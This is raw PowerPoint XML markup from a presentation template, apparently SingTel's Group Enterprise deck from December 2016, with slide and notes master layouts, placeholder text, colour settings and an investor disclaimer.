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Lst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId16"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId17"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="271" r:id="rId6"/>
    <p:sldId id="268" r:id="rId7"/>
    <p:sldId id="272" r:id="rId8"/>
    <p:sldId id="274" r:id="rId9"/>
    <p:sldId id="275" r:id="rId10"/>
    <p:sldId id="277" r:id="rId11"/>
    <p:sldId id="278" r:id="rId12"/>
    <p:sldId id="279" r:id="rId13"/>
    <p:sldId id="280" r:id="rId14"/>
    <p:sldId id="270"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1A3D"/>
    <a:srgbClr val="F1697E"/>
    <a:srgbClr val="EE0033"/>
    <a:srgbClr val="FB1536"/>
    <a:srgbClr val="FB2544"/>
    <a:srgbClr val="FB2947"/>
    <a:srgbClr val="FA0629"/>
    <a:srgbClr val="FB3B56"/>
    <a:srgbClr val="FF0066"/>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3" autoAdjust="0"/>
    <p:restoredTop sz="92535" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="-1758" y="-24"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="342"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="-1662" y="-72"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2880"/>
        <p:guide orient="horz" pos="3024"/>
        <p:guide pos="2160"/>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00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1440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{1A43EB6D-C603-4039-B83F-202B343943CB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/21/2016</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2" y="9119474"/>
            <a:ext cx="3169920" cy="4800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1440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{DE124458-491E-4C84-A861-FAFFF0F89C89}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="6653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1727"/>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4143589" y="0"/>
            <a:ext cx="3169920" cy="481727"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{62EF90AC-B658-4113-B09A-B79DE7796CE8}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:pPr/>
              <a:t>21/12/2016</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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2" y="9119475"/>
            <a:ext cx="3169920" cy="481726"/>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4143589" y="9119475"/>
            <a:ext cx="3169920" cy="481726"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{85CD81C6-497D-4C55-8D6D-B2A051C5AA8A}" type="slidenum">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="2532277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CD81C6-497D-4C55-8D6D-B2A051C5AA8A}" type="slidenum">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Dis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14" name="Title 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="236242" y="5287365"/>
            <a:ext cx="2920482" cy="658098"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Title</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Placeholder 20"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258764" y="6298247"/>
            <a:ext cx="2869560" cy="356571"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Date:</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="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7519496" y="8974591"/>
            <a:ext cx="976148" cy="457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9301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SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{D0D4B060-A08F-459A-913B-A8B9FE6D8C7C}"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7"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10" name="Oval 9"/>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3713827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ABD1D7-36E3-4632-A7F3-DBD6215F536A}"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6"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7" name="Oval 6"/>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33129414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400" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG"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4C42CD-0466-455C-8D16-8C5D2A58CE89}"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8"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9" name="Oval 8"/>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6709430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SG"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E83DED-4B68-46B3-9CB9-CC564B969354}"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8"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9" name="Oval 8"/>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21382582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fld id="{E09DBE13-79E6-4E5A-91C4-F537B7596B04}"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7"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8" name="Oval 7"/>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425047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SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1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14" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6356351"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F022B90F-918A-4899-BB2B-94EF040E84B4}"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7" name="Oval 6"/>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21815686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7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285755" y="1031843"/>
            <a:ext cx="8569325" cy="479090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8" name="Oval 7"/>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15951731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lang="en-US" sz="5600" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr sz="5600"/>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lang="en-US" sz="2200" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>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8" name="Oval 7"/>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1276180450"/>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4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179388" y="6336268"/>
            <a:ext cx="8736012" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Disclaimer: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This material that follows is a presentation of general background information about SingTel’s activities current at the date of the presentation. The information contained in this document is intended only for use during the presentation and should not be disseminated or distributed to parties outside the presentation. It is information given in summary form and does not purport to be complete. It is not to be relied upon as advice to investors or potential investors and does not take into account the investment objectives, financial situation or needs of any particular investor. This material should be considered with professional advice when deciding if an investment is appropriate.</a:t>
            </a:r>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71077" y="2717084"/>
            <a:ext cx="7509933" cy="578891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="942389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Dis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14" name="Title 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="236242" y="5287365"/>
            <a:ext cx="2920482" cy="658098"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Title</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Placeholder 20"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258764" y="6298247"/>
            <a:ext cx="2869560" cy="356571"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Date:</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="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7519496" y="8974591"/>
            <a:ext cx="976148" cy="457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8457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_Arc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itle Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="965105"/>
            <a:ext cx="674603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b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="475860" y="2295332"/>
            <a:ext cx="5010539" cy="2444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xmlns="" val="1579008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 Arc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Title Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2612569" y="946444"/>
            <a:ext cx="60462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b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2585851" y="2258008"/>
            <a:ext cx="5010539" cy="1889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xmlns="" val="92342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Divider - Plain">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Oval 3"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2198077" y="-4350727"/>
            <a:ext cx="7665427" cy="7665427"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ED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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493417" y="530201"/>
            <a:ext cx="2920482" cy="658098"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Placeholder 20"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534989" y="1750633"/>
            <a:ext cx="2869560" cy="356571"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Date:</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG"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360295" y="6220790"/>
            <a:ext cx="6783705" cy="522910"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="1880833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Divider - Plain">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Oval 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3815862" y="-5102469"/>
            <a:ext cx="8474319" cy="8474319"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ED1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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5351167" y="396851"/>
            <a:ext cx="2920482" cy="658098"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 20"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5392739" y="1617283"/>
            <a:ext cx="2869560" cy="356571"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Date:</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG"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180785"/>
            <a:ext cx="6783705" cy="522910"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="2922902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24600"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{5B4DEF93-ADD1-4629-8A38-C2F296FE4615}"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1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a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="159938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smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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8" name="Oval 7"/>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2558313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SG"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5" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E0C6B949-EE58-4B7A-942E-F727EA666C7C}"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9"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11" name="Oval 10"/>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37898005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SG"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fld id="{999A5BCD-897A-4CE2-A0B4-4E3205E290F6}" type="datetime1">
              <a:rPr lang="en-SG" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>21/12/2016</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG" dirty="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6759248" y="6548106"/>
            <a:ext cx="21336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smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Oval 12"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7537062" y="6093681"/>
            <a:ext cx="1273974" cy="1273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a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Group Enterprise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="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xmlns="" val="28793805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dirty="0"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dirty="0"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9DE80AA-0C34-42C3-AD3B-11AB3B80D392}" type="datetime1">
              <a:rPr lang="en-SG">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>21/12/2016</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"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SG" dirty="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6758880" y="652026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B5CD8A2-17DD-477B-88E2-9F56A10AB6E6}" type="slidenum">
              <a:rPr lang="en-SG">
                <a:solidFill>
